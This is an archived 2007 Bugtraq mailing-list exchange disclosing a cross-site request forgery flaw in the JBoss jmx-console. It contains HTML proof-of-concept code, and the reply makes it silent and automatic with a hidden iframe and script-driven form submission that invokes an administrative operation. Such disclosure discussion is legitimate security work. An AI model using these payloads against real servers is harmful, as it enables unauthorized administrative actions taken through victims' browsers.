lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list] 
Date: Fri, 23 Feb 2007 00:21:06 +0000
From: pagvac <unknown.pentester@...il.com>
To: "buben.razuma@...il.com" <buben.razuma@...il.com>
Cc: bugtraq@...urityfocus.com
Subject: Re: JBoss jmx-console CSRF

Hey dude!

What's the authentication mechanism used by JBoss console? A login
HTML form, or HTTP basic auth? If it's the first one and cookies are
used as session tokens your exploit should work (the web browser will
submit the cookie to the target IP/domain when the evil page is
visited).

Although I haven't verified it, it should work as long as the requests
are not tokenized with some dynamic random value.

You might want to remove the submit button and make the form submitted
automatically in the background by calling it from an iframe:

<!-- start of evil.html -->
<iframe src="./POST_request.html" height="0" width="0" frameborder="0"></iframe>
<!-- end of evil.html -->

<!-- start of POST_request.html -->
<form method="post" name="evil"
action="http://host:port/jmx-console/HtmlAdaptor">
    <input type="hidden" name="action" value="invokeOp">
    <input type="hidden" name="name" value="jboss.j2ee:service=EARDeployer">
     <input type="hidden" name="methodIndex" value="0">
</form>

<script>document.evil.submit();</script>
<!-- end of POST_request.html -->

You might be interested in the following posts that discuss CSRF
hacking techniques:

http://www.gnucitizen.org/blog/csrf-ing-blogger-classic
http://www.gnucitizen.org/blog/cross-site-request-forgery/

Can anyone verify this CSRF issue?

On 22 Feb 2007 11:04:20 -0000, buben.razuma@...il.com
<buben.razuma@...il.com> wrote:
> Hello!
> Recent message about JBoss's console made me looking at that interface again and it seems that it is vulnerable for the CRSF attacks.
>
> MBean settings may be changed and operations may be invoked on behalf of the authenticated administrator by the hidden submitting form like follows:
>
> <form method="post" action="http://host:port/jmx-console/HtmlAdaptor">
>    <input type="hidden" name="action" value="invokeOp">
>    <input type="hidden" name="name" value="jboss.j2ee:service=EARDeployer">
>
>    <input type="hidden" name="methodIndex" value="0">
>    <input type="submit" value="Invoke">
> </form>
>
> Please, correct me, if I'm wrong.
>
> BR,
> B.R.
> Best regards,
>


-- 
pagvac
[http://ikwt.com/]

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ